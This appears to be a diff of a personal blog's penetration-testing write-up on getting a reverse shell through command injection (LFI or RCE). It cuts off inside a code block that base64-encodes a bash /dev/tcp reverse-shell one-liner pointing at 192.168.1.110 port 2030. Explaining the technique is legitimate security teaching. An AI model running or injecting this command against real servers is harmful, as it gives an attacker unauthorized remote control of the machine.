h4ndsh/h4ndsh.github.io/2023/phpinfo/index.md

 # Reverse Shell

 In a scenario where a server allows the injection of Unix commands, such as through vulnerabilities like Local File Inclusion (LFI) or Remote Code Execution (RCE), it becomes possible to send a specific command to establish a reverse shell.
 A reverse shell is a connection initiated from the compromised server to the attacker's machine, providing the attacker with control over the server.
-To achieve this, I modify a previously used Python3 script to inject a command that opens a reverse shell on their own computer.
+To achieve this, I modified a previously used Python3 script to inject a command that opens a reverse shell on their own computer.
 For ease of use, the reverse shell command is encoded in base64, with the IP address "192.168.1.110" and port "2030" specified as the connection destination.

 ```bash
 echo 'bash -c "sh -i >& /dev/tcp/192.168.1.110/2030 0>&1"' | base64 -w 0